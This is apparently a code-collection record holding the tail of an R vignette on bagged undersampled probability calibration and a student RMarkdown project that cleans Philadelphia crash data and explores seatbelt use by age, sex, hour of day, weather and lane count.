And when `ntimes > 1`, it is the weighted average, and the weight is obtained using `ntimes` runs on each sampled dataset.\n\n$$\\hat{P}(y_i | x_i) = \\frac{1}{k}\\sum_{j=1}^k \\hat{P}_j(y_i | f_{ij})$$\n$$\\hat{P}(y_i | x_i) = \\frac{1}{z}\\sum_{j=1}^k \\frac{1}{\\text{Var}(\\hat{P}_j(y_i | f_{ij}))} \\hat{P}_j(y_i | f_{ij}),$$\nwhere \n$$z = \\sum_{j=1}^k \\frac{1}{\\text{Var}(\\hat{P}_j(y_i | f_{ij}))}$$\n\n\nModels are trained using `trainset`, and predictions are made on `newX`. `response_name` specifies the name of the response in the trainset, and `model` specifies the model to work on. The function can now work with logistic regression models `'lr'`, naive Bayes models `'nb'`, random forest classifiers `'rf'`, and support vector machine classifiers `'svm'`. `nbags` specifies how many samples sets are used for bagging. Note that a large value will not lead to overfitting and will reduce the variance more, with the only cost being heavy computation load. And to speed up the bagging procedure, parallel computing is enabled. Find the number of cores in your computer, and then set `ncluster`.\n\n```{r args-bagCalibrate}\n# show the arguments of bagCalibrate\nargs(bagCalibrate)\n\n# find the number of cores in your computer\nlibrary(doParallel)\ndetectCores()\n```\n\nHere, we use SVM as an example, and compare the standard calibration method with the bagged undersampled method. Note that the same formula of SVM is used for both methods. 
As the stratified Brier scores suggest, the bagged undersampled method can greatly mitigate the effect of imbalance in the positive class calibration, without much sacrifice in the negative class and the overall.\n\n```{r standard-svm}\n# standard probability calibration\nsvc <- svm(formula = as.factor(y) ~ ., data = train_set, \n type = 'C-classification', kernel = 'linear', probability = TRUE) \npred <- predict(svc, X.test, probability = TRUE)\nprob.svc <- as.data.frame(attr(pred, \"probabilities\"))$`1`\nstratifiedBrier(y.test, prob.svc)\n```\n\n```{r bag-svm}\n# simple version of bagged undersampled calibration\nbag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', \n type = 'C-classification', kernel = 'linear', \n nbags = 30, ntimes = 1, ncluster = 4)\nstratifiedBrier(y.test, bag.prob.svm)\n```\n\n```{r weighted-bag-svm}\n# weighted version of bagged undersampled calibration\nweighted.bag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', \n type = 'C-classification', kernel = 'linear', \n nbags = 30, ntimes = 20, ncluster = 4)\nstratifiedBrier(y.test, weighted.bag.prob.svm)\n```\n\n```{r comp-svm, fig.height = 5, fig.width = 5}\ncomparisonPlot(y.test, list(prob.svc, bag.prob.svm, weighted.bag.prob.svm), \n c(\"SVM\", \"bagged-under SVM\", \"Weighted-bagged-under SVM\"), nbins = 8)\n```\n\n\n## References:\n\n1. Wallace, B.C., Dahabreh, I.J. Improving class probability estimates for imbalanced data. Knowl Inf Syst 41, 33–52 (2014). https://doi.org/10.1007/s10115-013-0670-6\n2. Alexandru Niculescu-Mizil and Rich Caruana. 2005. Predicting good probabilities with supervised learning. In Proceedings of the 22nd international conference on Machine learning (ICML ’05). Association for Computing Machinery, New York, NY, USA, 625–632. DOI:https://doi.org/10.1145/1102351.1102430\n3. [sklearn documentation: Probability Calibration](https://scikit-learn.org/stable/modules/calibration.html#calibration)\n\n" } ]
58
robi86/Masters-Project-Work
https://github.com/robi86/Masters-Project-Work
949c485f11a00d502cc39c062a052f4b5f2c04a9
61ecd71d1907a5d98b72407ef39ae7dad19b4ee5
518728c492e0335e8865a20915e7cd32c89c6f8c
refs/heads/master
2021-09-07T19:34:40.327101
2018-02-27T23:59:05
2018-02-27T23:59:05
114,930,363
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.782608687877655, "alphanum_fraction": 0.782608687877655, "avg_line_length": 90, "blob_id": "1f6b5d2cba58e1e72de7503a26c3539d6d6a30ca", "content_id": "2e1aaf93f331c9ef5518b10a617fef8919a0e165", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 92, "license_type": "no_license", "max_line_length": 90, "num_lines": 1, "path": "/Introduction to Data Mining/Final/Raw Data/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains the raw data for the final project. This data comes from CMS and CDC. \n" }, { "alpha_fraction": 0.8269230723381042, "alphanum_fraction": 0.8269230723381042, "avg_line_length": 50, "blob_id": "1a366e84d645bdace19ad962938d09d489e1b819", "content_id": "b2e28267e01804643cd301ed47bfc7955b662eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 50, "num_lines": 1, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/Visualizations/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Figures for parameter tuning and cross validation. \n" }, { "alpha_fraction": 0.7831325531005859, "alphanum_fraction": 0.7831325531005859, "avg_line_length": 81, "blob_id": "0a2eabe6f4df38775ad9e04541fb07a49526f5da", "content_id": "13fc279478e46ff58357e7efa3eb217259f50d15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "RMarkdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 81, "num_lines": 1, "path": "/Machine Learning I/Midterm/README.rmd", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains code, a report, and a presentation for the mid-term project. 
\n" }, { "alpha_fraction": 0.6685097217559814, "alphanum_fraction": 0.6979392766952515, "avg_line_length": 61.83103561401367, "blob_id": "d8b9d48fc39cc5fab54fb10e38a78989962110f2", "content_id": "bdd583664b05ca68463971661ce96a5a9607f543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "RMarkdown", "length_bytes": 72886, "license_type": "no_license", "max_line_length": 845, "num_lines": 1160, "path": "/Introduction to Data Science/Final_Project_Code.rmd", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "\n---\ntitle: \"Predicting Seatbelt Use in Philadelphia Automobile Crashes\"\nauthor: \"David Robison\"\ndate: \"April 24, 2017\"\noutput:\n html_document: default\n---\n\n```{r setup, include=FALSE}\nknitr::opts_chunk$set(echo = TRUE)\n```\n\nGeorge Washington University DATS 6101 - Final Project: Logistic Regression for Modeling Crashes in Philadelphia by David Robison\n\n### Research Question: In the City of Philadelphia between 2011 - 2014, based on potential risk factors recorded at the time of an automobile accident, what is the probability that an occupant of a vehicle was not wearing a seatbelt?\n\nAs a final project for DATS 6101: Introduction to Data Science, our group chose to further investigate seatbelt use among automobile occupants involved in car accidents in the City of Philadelphia between 2011 - 2015. This analysis is a follow-on to our initial work conducted in February 2017. In that analysis, using the same dataset, we sought to answer whether seatbelt use varied by age and gender of the drivers and passengers involved in an accident.\n\nAfter considerable data cleaning, we performed Pearson's chi-square tests on our Age Group and Sex variables. In each test, the resulting p-value was highly significant providing enough evidence to reject the null hypothesis that seatbelt use is not independent of age or sex of the occupant. 
To extend this work, we now will try to identify additional risk factors for not wearing a seatbelt. From the identified variables, we will then try to fit a model that can accurately predict the binomial outcome of whether or not an occupant involved in the accident was wearing their seatbelt. \n\nThe datasets and metadata for this and the prior analysis can be found at: http://metadata.phila.gov/#home/datasetdetails/5543865420583086178c4eba/. For this analysis, we use three datafiles: the Collision Data - Persons Table, Collision Data - Crash Shapefile, and the Roadway Table. The Collisions Data - Persons Table was used to verify that seatbelt use varies by Age and Sex. \n\nThe Collisions Data - Crash Shapefile and Roadway Table are the new datasets that will be used to extend the number of variables in our data. These datasets are merged using an inner join on the Crash Reference Number (CRN), which provides a unique identifier for each crash record across the separate data files. \n\nThe analysis begins in Section 2 and provides some of the exploratory data analysis (EDA) and findings from the first project. In Section 3 & 4, the new data files are merged with the final dataframe from the mid-term and an EDA of the new variables is conducted before model fitting in Section 6 & 7. \n\n### 1. Installing & Loading Modules/Packages\n\nThis section installs the necessary graphing and statistical packages. 
\n\n```{r, echo = TRUE}\n# plyr: tables, revaluing\nif (!is.element(\"plyr\", installed.packages()[,1]))\n install.packages(\"plyr\", dependencies = TRUE)\n require(\"plyr\", character.only = TRUE)\n\n# dplyr: tables, revaluing\nif (!is.element(\"dplyr\", installed.packages()[,1]))\n install.packages(\"dplyr\", dependencies = TRUE)\n require(\"dplyr\", character.only = TRUE)\n\n# car: companion to applied regression\nif (!is.element(\"car\", installed.packages()[,1]))\n install.packages(\"car\", dependencies = TRUE)\n require(\"car\", character.only = TRUE)\n\n# ggplot2: visuals\nif (!is.element(\"ggplot2\", installed.packages()[,1]))\n install.packages(\"ggplot2\", dependencies = TRUE)\n require(\"ggplot2\", character.only = TRUE)\n\n# ROCR: visuals for classifier performance\nif (!is.element(\"ROCR\", installed.packages()[,1]))\n install.packages(\"ROCR\", dependencies = TRUE)\n require(\"ROCR\", character.only = TRUE)\n\n# pRoc: visualizing ROC curves\nif (!is.element(\"pROC\", installed.packages()[,1]))\n install.packages(\"pROC\", dependencies = TRUE)\n require(\"pROC\", character.only = TRUE)\n\n# bestglm: best subset glm using information criteria or cross-validation\nif (!is.element(\"bestglm\", installed.packages()[,1]))\n install.packages(\"bestglm\", dependencies = TRUE)\n require(\"bestglm\", character.only = TRUE)\n\n# pscl: Political Science Computational Laboratory, Stanford University\nif (!is.element(\"pscl\", installed.packages()[,1]))\n install.packages(\"pscl\", dependencies = TRUE)\n require(\"pscl\", character.only = TRUE)\n\n# rgl: 3D Visualization Using OpenGL\nif (!is.element(\"rgl\", installed.packages()[,1]))\n install.packages(\"rgl\", dependencies = TRUE)\n require(\"rgl\", character.only = TRUE)\n\n# visreg\nif (!is.element(\"visreg\", installed.packages()[,1]))\n install.packages(\"visreg\", dependencies = TRUE)\n require(\"visreg\", character.only = TRUE)\n\nif (!is.element(\"forcats\", installed.packages()[,1]))\n 
install.packages(\"forcats\", dependencies = TRUE)\n require(\"forcats\", character.only = TRUE)\n```\n\n### 2. Loading & Cleaning Midterm Data Set\nThe code below is from the analysis conducted for the mid-term project. This section is meant to be a refresher. It includes the EDA of the Age variable from the Collision Data - Persons Table followed by the steps taken to cleanse the data, graphical representations of seatbelt use by age, and results of the chi-square test. It is important to note that driver and passenger seatbelt use is contained in the Collisions Data - Persons Table.\n\n```{r}\n# Philadelphia Persons Crash dataset, loaded from Philadelphia Metadata Catalog.\npersons <- read.csv(url(\"http://data.phl.opendata.arcgis.com/datasets/5ba1194f422e488e8549f8d96b788033_1.csv\"))\nstr(persons)\n\n# Begin cleaning of Persons dataset, resulting in crashes data frame\npersons_clean <- subset(persons, PERSON_TYPE == 1 | PERSON_TYPE == 2) # select either driver or passenger\npersons_clean <- subset(persons_clean, AGE != 99 & AGE != 98) #or, AGE < 98\npersons_clean <- subset(persons_clean, !(AGE == 1 & PERSON_TYPE == 1)) # remove age 1 drivers\npersons_clean$restraint_used <- mapvalues(persons_clean$RESTRAINT_HELMET, from = c(\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"10\", \"11\", \"12\", \"90\", \"99\"), to = c(\"None Used/NA\", \"Shoulder Belt\", \"Lap Belt\", \"Lap and shoulder belt\", \"Child safety seat\", \"Motorcycle helmet\", \"Bicycle helmet\", \"Improperly used safety belt\", \"Improperly used child safety seat\", \"Improperly used helmet\", \"Restraint used, unknown type\", \"Unknown\"))\n\n#PERSON_TYPE: 1 - Driver, 2 - Passenger, 7 - Pedestrian, 8 - Other, 9 - Unknown\n\npersons_clean$Involvement <- mapvalues(persons_clean$PERSON_TYPE, from = c(\"1\", \"2\", \"7\", \"8\", \"9\"), to = c(\"Driver\", \"Passenger\", \"Pedestrian\", \"Other\", \"Unknown\"))\n\ndropageU <- subset(persons_clean, SEX==\"M\" | SEX==\"F\", drop = TRUE) # 7 blank sex 
entries too..\n\ncrashes <- subset(dropageU, (RESTRAINT_HELMET != 5 & RESTRAINT_HELMET != 6 & RESTRAINT_HELMET != 12 & RESTRAINT_HELMET != 99)) \n\ncrashes$seatbelt <- recode(crashes$restraint_used, 'c(\"Child safety seat\", \"Lap Belt\", \"Lap and shoulder belt\", \"Restraint used, unknown type\", \"Shoulder Belt\") = \"Yes\"; c(\"Improperly used child safety seat\", \"Improperly used safety belt\", \"None Used/NA\") = \"No\" ')\n\ncrashes$SEX <- droplevels(crashes$SEX)\n\n# INITIAL EXPLORATORY DATA ANALYSIS FROM MIDTERM \nboxplot(x = crashes$AGE, main = \"Ages Boxplot - Philadelphia Crash Data\", \n horizontal = TRUE)\n\ncrashes$AgeGroup <- cut(crashes$AGE, c(0,15,20,26,32,50,75,99), \n labels = c(\"Youth\", \"Teenager\", \"Early Twenties\", \n \"Late Twenties/Early Thirties\", \"Early Middle Age\",\n \"Middle Age\", \"Senior\"))\nage_chi = table(crashes$AgeGroup, crashes$seatbelt)\nage_chi\nchisq.test(age_chi)\n#Create a dataframe of percent frequency of our seatbelt use categories for each age group\nageBeltFreq <- crashes %>%\n group_by (AgeGroup, seatbelt) %>%\n summarise (n=n()) %>%\n mutate(Freq = (n / sum(n)) * 100)\n\nageBeltFreq_df <- as.data.frame(ageBeltFreq)\n\n#Plot the seatbelt use percent frequency and age group relationship in two different wys\n\nggplot(crashes, aes(AgeGroup, fill=seatbelt) ) +\n geom_bar(position=\"dodge\") + \n ggtitle(\"Seatbelt Use by Age Group\") +\n theme(plot.title = element_text(size=12, hjust=0.5), legend.position = \"top\",\n legend.title = element_blank(), axis.title.x = element_blank(), \n axis.text.x = element_text(angle = 45, hjust = 1))+ylab(\"Count\")\n\nggplot(ageBeltFreq_df, \n aes(x = ageBeltFreq_df$AgeGroup, y = ageBeltFreq_df$Freq, \n label = round(Freq,2)))+geom_count(aes(ageBeltFreq_df$AgeGroup,\n ageBeltFreq_df$Freq, \n fill = seatbelt, colour = seatbelt),\n size = 7) +\n theme(plot.title = element_text(hjust = 0.5),legend.position = \"top\", \n axis.text.x = element_text(angle = 45, hjust = 1)) +\n 
ylab(\"Percent Frequency\") + \n theme(axis.title.x = element_blank(), \n legend.title = element_blank()) + \n ggtitle(\"Seatbelt Use by Age Group (% Frequency)\")+geom_text(size= 3)\n```\n\n### 3. Read in new datsets\n\nTo begin the follow-on analysis, we'll read in two new dataframes from the City of Philadelphia. The first is a Crash File that has variables related to the crash itself such as time of day, weather, etc. The second new data source is the Roadway Table that provides descriptions about the road where the crash happened. For example, the speed limit and the number of lanes. \n\n```{r}\n#Create the crash data frame, loaded from Philadelphia Metadata Catalog.\ncrashDf <- read.csv(url(\"http://data.phl.opendata.arcgis.com/datasets/5ba1194f422e488e8549f8d96b788033_0.csv\"))\n\n\n#Subset the crash dataframe for the potential predictor variables that we are interested in\ncrashDf <- subset(crashDf, select = c(\"CRN\", 'HOUR_OF_DAY', \"DAY_OF_WEEK\",\n'TIME_OF_DAY',\n'CRASH_MONTH',\n'WEATHER',\n\"ROAD_CONDITION\",\n\"LATITUDE\", \n\"LONGITUDE\"\n))\n\n#Create the roadway data frame, loaded from Philadelphia Metadata Catalog.\nroadwayDf <- read.csv(url(\"http://data.phl.opendata.arcgis.com/datasets/5ba1194f422e488e8549f8d96b788033_3.csv\"))\n\n#subset the roadway dataframe\nroadwayDf <- subset(roadwayDf, select = c(\"CRN\", \"LANE_COUNT\", \"SPEED_LIMIT\"))\nroadwayDf <- subset(roadwayDf, !duplicated(CRN))\n\n```\n\n\n### 4. Merge Two New Data Sources (RoadwayDf, CrashesDf) with the Final Dataframe from the Midterm Proect (Crashes)\n\nWith the two new data files stored as dataframes and the desired columns selected, we next combine them with the final dataframe from the mid-term - 'crashes' - using an inner join on the Crash Reference Number (CRN) column. Again, it is important to recall that driver and passenger seatbelt use is contained in the 'crashes' dataframe. 
Therefore, by using an inner join on the CRN, we create a dataframe that in addition to seatbelt use has new variables that are unique to either a driver or passenger involved in an accident. This new dataframe 'persons_crashes_roadway_innerjoin' will serve as the primary data set for the remainder of the analysis. \n\n```{r}\n# First merge our 'Crashes' dataframe i.e. cleaned persons dataframes with the raw crash shapefile \nperson_crashes_innerjoin <- inner_join(crashes, crashDf, by = c(\"CRN\" = \"CRN\"))\nperson_crashes_roadway_innerjoin <- inner_join(person_crashes_innerjoin, roadwayDf, by = c(\"CRN\" = \"CRN\"))\n\n#Save both dataframes as a CSV file\nwrite.csv( person_crashes_roadway_innerjoin, file = \"person_crashes_roadway_innerjoin.csv\")\nstr(person_crashes_roadway_innerjoin)\n```\n\n\n### 5. EDA of Newly Added Variables Merged into Crashes_Persons_Roadway_InnnerJoin Data Frame, including Lane Count, Speed Limit, Hour of Day, Day of Week\n\nThe new primary dataframe is called crashes_persons_roadway_innerjoin. For our explanatory data analysis, we'll copy this into a new data frame called newEDADf. After the EDA, we'll come back and modify the person_crashes_roadway_innerjoin based upon our observations. Overall, we are trying to identify variables that are coded as unknown or do not make sense. These 'noisy' observations will need to be removed before we begin model fitting. \n\n```{r}\nnewEDADf <- person_crashes_roadway_innerjoin\n\nstr(newEDADf)\n```\n\nWe've added variables for the Lane Count, Speed Limit, Hour of Day, Day of Week, Crash Month, Weather, and Road Condition. \nLet's use histograms and the table function to look at the distribution of the new variables and see if we can identify variables coded as unknown. 
\n```{r}\npar(mfrow = c(2,2))\n\nhist(newEDADf$LANE_COUNT, breaks = 100, xlim = c(0,8), main = \"Lane Count\", xlab = NULL) #Note we are excluding lane counts above 8\n\nhist(newEDADf$SPEED_LIMIT, main = \"Speed Limit\", xlab = NULL)\n\nhist(newEDADf$HOUR_OF_DAY, breaks = 24, xlim = c(0,25), main = \"Hour of Day\", xlab = NULL)\n\nhist(newEDADf$DAY_OF_WEEK, breaks = 14, main = \"Day of Week\", xlab = NULL)\nprint(\"Lane Count\")\ntable(newEDADf$LANE_COUNT)\nprint(\"Speed Limit\")\ntable(newEDADf$SPEED_LIMIT)\nprint(\"Hour of Day\")\ntable(newEDADf$HOUR_OF_DAY)\nprint(\"Day of the Week\")\ntable(newEDADf$DAY_OF_WEEK)\n```\n\nWe observe that most of our data is from crashes on road with 2 LANES OR LESS and a speed limit BELOW 35 MPH. In addition, crashes by hour of day shows a normal distribution centered around ~3:00 PM with an equal distribution across the days of the week. \n\nLooking at the tables we see that lane goes from 1-99, so we need to drop some of these variables. In Hour of Day, we need to drop 99. \n\nLet's continue to use histograms and tables to look at the distribution of Road Condition & Weather\n```{r}\npar(mfrow = c(2,1))\n\nhist((newEDADf$ROAD_CONDITION), breaks = 8, main = \"Road Condition\", xlab = NULL)\nhist(newEDADf$WEATHER, breaks = 8, main = \"Weather\", xlab = NULL)\n\ntable(newEDADf$WEATHER) \n\ntable(newEDADf$ROAD_CONDITION) \n```\n\nFrom the table, we see that weather is coded using 10 categories, including a -1. These will later need to be combined into larger categories. Most of the dataset is coded with a 1 under the weather variable, signifying Clear weather. From the Road_Condition table, we see 9 different road conditions. The descriptions are similar to weather condition and might have some collinearity. For our model we'll likely exclude one of these. \n\nNext, we'll take a look at Hour of Day and Seatbelt Use in the entire dataset with a table. 
A table object can be passed to the plot function to help visualize the relationship of the two variables. \n```{r}\nhours_table <- table(newEDADf$HOUR_OF_DAY,\n newEDADf$seatbelt)\nplot(hours_table)\n```\nTo the naked eye, it looks like evening and early morning hours starting around 7:00 PM (17) and until 3:00 AM (3) have higher proportions of seatbelts not worn. \n\nWe'll also plot a table of Weather and Seatbelt Use.\n```{r}\nweather_table <- table(newEDADf$WEATHER,\n newEDADf$seatbelt)\nplot(weather_table)\n```\nThis plot is less conclusive. To the naked eye, there does not appear be be a visible difference in seatbelt use by Weather. \n\nWe've gotten a sense of some of our distributions as well as clues as to divisions in seatbelt usage within weather and hour of day variables. We'll dig into these divisions further. \n```{r}\n#Update Lane Count to Drop anything above 6 and then plot combined table\nnewEDADf <- subset(newEDADf, LANE_COUNT == 1 | LANE_COUNT == 2 | LANE_COUNT == 3 | LANE_COUNT == 4 | LANE_COUNT == 5 | LANE_COUNT == 6, drop = TRUE)\nlane_count_table <- table(newEDADf$LANE_COUNT, newEDADf$seatbelt)\nplot(lane_count_table) \n\n#Let's look at seatbelt use and Road Speed via new speed category variable, then plot table\nnewEDADf$Speed_Category <- cut(newEDADf$SPEED_LIMIT, c(0,35,65), labels = c(\"Low Speed\", \"High Speed\"))\nlane_count_speed <-table(newEDADf$Speed_Category, newEDADf$seatbelt)\nplot(lane_count_speed) \n\n#LOOK AT WEATHER AND SEATBELT USE, FIRST REGROUP WEATHER AS FACTOR AND CREATE NEW LEVELS\nnewEDADf$WEATHER <- factor(newEDADf$WEATHER, labels = c('Unknown -1', 'Clear', 'Rain', 'Sleet', 'Snow', 'Fog', 'Rain and fog', 'Sleet and fog', 'Other', 'Unknown'))\nlevels(newEDADf$WEATHER) <- list(Other = c(\"Unknown -1\", \"Unknown\", \"Other\"), Clear = \"Clear\", \n Rain_Fog = c(\"Rain\", \"Rain and fog\", \"Fog\"), \n Snow = c(\"Sleet\", \"Snow\", \"Sleet and fog\"))\nweather_belt <- table(newEDADf$WEATHER, newEDADf$seatbelt) 
\nplot(weather_belt)\n\ninvolvement_belt <- table(newEDADf$Involvement, newEDADf$seatbelt)\nplot(involvement_belt) \ninvovlement_lane_seatbelt <- table(newEDADf$Involvement, newEDADf$LANE_COUNT, newEDADf$seatbelt)\nplot(invovlement_lane_seatbelt) \n```\n\nIn the lane_count_table, it looks like seatbelts are worn less often on roads with a lane_count of 1 or 2. In lane_count_speed, it appears that seatbelts are worn less often in our 'Low Speed' category', which we defined as roads 35 MPH or less. In Weather_belt, there does not seem be to any consistent associations with weather and Seatbelt Use after we redruced the number of categories to Clear, Rain_Fog, Snow, and Other. In Involvement_Belt, we see we have more drivers in our dataset, but a significant portion of passengers were also not wearing seatbelts. Finally, Involvement_lane_seatbelt, shows that passenger and driver behavior are similar in that most do not wear seat belts in roadways with a lane count of 1 or 2. \n\nLet's look further at behavior for Male/Female and Driver/Passenger Behavior by HOUR_OF_DAY\n```{r}\nlibrary(gridExtra)\nnewEDADf <- subset(newEDADf, HOUR_OF_DAY < 99, drop = TRUE) #Drop Hour of Day that is Unknown and coded as 99. \n\ngraph4 <- ggplot(newEDADf,\n aes(x=newEDADf$HOUR_OF_DAY,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$SEX)+theme(legend.position=\"none\", axis.title.x = element_blank(), plot.title = element_text(hjust = 0.5))+ggtitle(\"Occupant Behavior by Time of Day\")\n \ngraph2 <- ggplot(newEDADf,\n aes(x=newEDADf$HOUR_OF_DAY,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$Involvement)+xlab(\"Hour of Day\")+theme(legend.position=\"bottom\")+labs(fill = \"Seatbelt Use\")\n\ngrid.arrange(graph4, graph2, ncol = 1)\n```\n\nFrom these plots it appears that the behavior of Males and Females across the Hours of the Day is similar with regards to wearing a seatbelt. 
The Driver versus Passenger plot does not present any clear conclusions.\n\nWe'll now look at behavior for Male/Female and Driver/Passenger by Lane Count. \n```{r}\ngraph3 <- ggplot(newEDADf,aes(x=newEDADf$LANE_COUNT,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$SEX)+theme(legend.position=\"none\",\n axis.title.x = element_blank(), plot.title = element_text(hjust = 0.5))+ggtitle(\"Occupant Behavior by Lane Count\")\n\ngraph1 <- ggplot(newEDADf,aes(x=newEDADf$LANE_COUNT,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$Involvement)+xlab(\"Lane Count\")+theme(legend.position=\"bottom\")+labs(fill = \"Seatbelt Use\")\n\ngrid.arrange( graph3, graph1, ncol=1)\n```\n\nFor Lane_Count, we see a similar behavior between Males and Females and Drivers Passengers in that seatbelts are most often not worn crashes occurs on roads with a Lane_Count of 2 or less. \n\nNext, we'll look occupants behavior by Age Group and Hour of Day. \n```{r}\nggplot(newEDADf,aes(x=newEDADf$HOUR_OF_DAY,\n fill=newEDADf$seatbelt)) + geom_bar(position=\"stack\")+facet_grid(~newEDADf$AgeGroup)+theme(legend.position = 'bottom', plot.title = element_text(hjust = 0.5)\n )+xlab(label = \"Hour of the Day\")+labs(fill = \"Seatbelt Use\")+ggtitle(\"Behavior by Age Group and Hour of Day\")\n```\n\nWe see our data set has more \"Early Middle Age\" than any other age group, and crashes peaks around 3:00 PM - 6:00 PM. Across all age groups, the number of accidents seems to show a similar pattern. However, by eye it is difficult to distinguish which hours of the day have greatest lack of seatbelt use. \nLet's make one more set of visualizations using a mosaic plot. Visually, these are a bit clunky, but they are extremely informative. Mosaic plots include standardized residuals. The standardized residual is a ratio of the difference between observed and expected counts with a Null Hypothesis that the variables are independent. 
In our case, the Null hypothesis is that the frequency of seatbelt use is independent of the Hour of Day. If the standardized residual is less than -2, the cells observed frequency is less than the expected frequency. If greater than 2, the observed frequency is greater than the expected frequency.\n```{r}\nmosaicplot(table(newEDADf$Involvement, newEDADf$seatbelt, newEDADf$HOUR_OF_DAY),main = \"Occupant Involvement vs. Hour of Day\", shade = TRUE)\n\nmosaicplot(table(newEDADf$SEX, newEDADf$seatbelt, newEDADf$HOUR_OF_DAY), main = \"Occupant Sex vs. Hour of Day\",shade = TRUE)\n```\n\nThese plots show us a lot of information. Let's take a moment to review them closely. For Occupant Sex vs. Hour of Day, we see that for females the hours of 0 - 3 have a standardized residual of < -2 for Seatbelt Use = Yes. This tells us that observed frequency of seatbelt use here is less than the expected frequency. For Males, we see that the hours of 7:00 - 5:00 AM have a standardized residual of greater than 2 for Seatbelt Use = No i.e. the observed frequency is greater than the expected frequency. This tells us that we can reject the null hypothesis and be confident that for Male occupants seatbelt use is less during nighttime and early morning hours. \n\nIn the Occupant Involvement vs Hour of the Day, both the plots for drivers and passengers seem to indicate a somewhat similar pattern. The driver plot shows standardized residuals less than -2 in the Yes category for several nighttime and early morning hours. In the passenger plot, we see a number of standardized residuals greater than 2 for the No Category.\n\nThese plots are useful as they allow us to infer that we can collapse this variable from 24 hours into a two level categorical variable such as night and day. We have now completed our Exploratory Data Analysis are ready to begin processing our data and preparing it for model building. \n\n### 6. 
Processing Dataframe for Model Building\n\nFirst, we'll convert all of the variables that we need to be factors and set labels and levels. In some cases, we'll drop levels that are coded as unknown e.g., Hour of Day = 99 or would add noise e.g., roads with a Lane Count greater than 6. \n```{r}\n#Set variables to factors and add level labels: \nperson_crashes_roadway_innerjoin$CRASH_MONTH <- factor(person_crashes_roadway_innerjoin$CRASH_MONTH, labels = c(\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"))\n\nperson_crashes_roadway_innerjoin$DAY_OF_WEEK <- factor(person_crashes_roadway_innerjoin$DAY_OF_WEEK, labels = c(\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"))\n\nperson_crashes_roadway_innerjoin$ROAD_CONDITION <- factor(person_crashes_roadway_innerjoin$ROAD_CONDITION, labels = c('Dry', 'Wet', 'Sand, mud, dirty, gravel', 'Snow', 'Slush', 'Ice', 'Ice Patches', 'Water','Other', 'Unknown'))\nlevels(person_crashes_roadway_innerjoin$ROAD_CONDITION) <- list(Dry = \"Dry\", Winter = c(\"Snow\", \"Ice Patches\", \"Slush\", \"Ice\"), Other = \"Other\", Wet = c(\"Water\", \"Wet\"), Unpaved = \"Sand, mud, dirty, gravel\", Unknown = \"Unknown\") #Group into four categories\n\nperson_crashes_roadway_innerjoin$WEATHER <- factor(person_crashes_roadway_innerjoin$WEATHER, labels = c('Unknown -1', 'Clear', 'Rain', 'Sleet', 'Snow', 'Fog', 'Rain and fog', 'Sleet and fog', 'Other', 'Unknown'))\nlevels(person_crashes_roadway_innerjoin$WEATHER) <- list(Unknown = c(\"Unknown -1\", \"Unknown\"), Clear = \"Clear\", Rain = c(\"Rain\", \"Rain and fog\"), Fog = \"Fog\", Snow = c(\"Sleet\", \"Snow\", \"Sleet and fog\"), Other = \"Other\")\nperson_crashes_roadway_innerjoin <- subset(person_crashes_roadway_innerjoin, person_crashes_roadway_innerjoin$WEATHER == \"Clear\" | person_crashes_roadway_innerjoin$WEATHER == \"Rain\" | 
person_crashes_roadway_innerjoin$WEATHER == \"Fog\" | person_crashes_roadway_innerjoin$WEATHER == \"Snow\", drop = TRUE)\nperson_crashes_roadway_innerjoin$WEATHER <- droplevels(person_crashes_roadway_innerjoin$WEATHER) #Keep only Weather of Clear, snow, Rain, and Fog\n\nperson_crashes_roadway_innerjoin <- subset(person_crashes_roadway_innerjoin, person_crashes_roadway_innerjoin$HOUR_OF_DAY < 99) #Remove unknown Hour of Day\nperson_crashes_roadway_innerjoin$HOUR_OF_DAY <- factor(person_crashes_roadway_innerjoin$HOUR_OF_DAY)\n\nperson_crashes_roadway_innerjoin <- subset(person_crashes_roadway_innerjoin, LANE_COUNT == 1 | LANE_COUNT == 2 | LANE_COUNT == 3 | LANE_COUNT == 4 | LANE_COUNT == 5 | LANE_COUNT == 6, drop = TRUE) #Drop lane counts greater than 6\n\nperson_crashes_roadway_innerjoin <- subset(person_crashes_roadway_innerjoin, SPEED_LIMIT < 65, drop = TRUE) #There are only 6 observations with speed limit of 65. For model fitting we cannot have a train data set with 65 and a test set withourt 65. Therefore, we drop anything greater than 65. \n\nstr(person_crashes_roadway_innerjoin)\n```\n\nWe can confirm that Weather, Hour of Day, Speed Limit and Lane Count are as we desire them and have dropped levels.\n```{r}\ntable(person_crashes_roadway_innerjoin$WEATHER)\n\ntable(person_crashes_roadway_innerjoin$HOUR_OF_DAY)\n\ntable(person_crashes_roadway_innerjoin$LANE_COUNT)\n\ntable(person_crashes_roadway_innerjoin$SPEED_LIMIT)\n```\n\nWe now have a dataframe filled with categorical variables and a response variable of seatbelt_yn. We'll copy this into a new dataframe called crashes_persons_roadway. We'll also set the response variable to be more interpretable, making 0 represent seatbelt = NO and 1 represent seatbelt = Yes. 
